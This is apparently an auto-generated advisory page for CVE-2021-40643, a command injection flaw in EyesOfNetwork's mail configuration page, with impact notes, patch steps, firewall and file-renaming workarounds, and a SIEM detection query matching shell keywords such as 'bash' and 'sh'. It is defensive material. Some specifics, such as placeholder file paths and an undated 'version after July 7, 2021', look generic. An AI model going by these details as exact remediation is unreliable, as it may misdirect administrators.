CVE-2021-40643
📋 TL;DR
CVE-2021-40643 is a remote code execution vulnerability in EyesOfNetwork's mail configuration page where attackers can inject arbitrary commands into the sendmail path field. This affects all EyesOfNetwork installations before July 7, 2021 that have the vulnerable mail configuration page accessible.
💻 Affected Systems
- EyesOfNetwork
📦 What is this software?
Eyesofnetwork by Eyesofnetwork
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining root privileges, installing backdoors, stealing sensitive data, and pivoting to other systems.
Likely Case
Attacker executes commands to establish persistence, exfiltrate monitoring data, or deploy ransomware/cryptominers.
If Mitigated
Limited impact due to network segmentation, proper access controls, and monitoring preventing successful exploitation.
🎯 Exploit Status
Exploitation requires authentication to access the configuration page, but the vulnerability is simple to exploit once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version after July 7, 2021
Vendor Advisory: https://www.eyesofnetwork.com/en/news/vulnerabilite-cacti
Restart Required: Yes
Instructions:
1. Update EyesOfNetwork to version after July 7, 2021. 2. Apply the security patch from the vendor. 3. Restart the EyesOfNetwork services. 4. Verify the fix by checking the version and testing the mail configuration functionality.
🔧 Temporary Workarounds
Restrict Access to Configuration Page
linuxLimit access to the vulnerable mail configuration page using network controls or authentication restrictions.
# Configure firewall rules to restrict access to EyesOfNetwork web interface
# Example: iptables -A INPUT -p tcp --dport 80 -s trusted_ip -j ACCEPT
# Example: iptables -A INPUT -p tcp --dport 443 -s trusted_ip -j ACCEPT
Remove or Disable Mail Configuration
linuxTemporarily disable the mail configuration functionality if not required.
# Rename or remove the vulnerable configuration file
mv /path/to/cacti/mail_config.php /path/to/cacti/mail_config.php.disabled
🧯 If You Can't Patch
- Implement strict network segmentation to isolate EyesOfNetwork from critical systems.
- Deploy application-level WAF rules to block command injection patterns in web requests.
🔍 How to Verify
Check if Vulnerable:
Check if EyesOfNetwork version is before July 7, 2021 and if the mail configuration page accepts command injection in the sendmail path field.Check Version:
grep 'version' /usr/share/eyesofnetwork/version.txt || check EyesOfNetwork web interface admin panelVerify Fix Applied:
Verify the EyesOfNetwork version is after July 7, 2021 and test that command injection in the sendmail field no longer executes arbitrary commands.📡 Detection & Monitoring
Log Indicators:
- Unusual commands in web server logs related to mail configuration
- Failed authentication attempts followed by successful access to configuration pages
- Execution of unexpected system commands from web server process
Network Indicators:
- Unusual outbound connections from EyesOfNetwork server
- HTTP POST requests to mail configuration endpoints with suspicious payloads
SIEM Query:
source="web_server.log" AND (uri="/cacti/mail_config" OR uri="/mail/configure") AND (method="POST" OR method="PUT") AND (payload="sendmail" OR payload="cmd" OR payload="bash" OR payload="sh")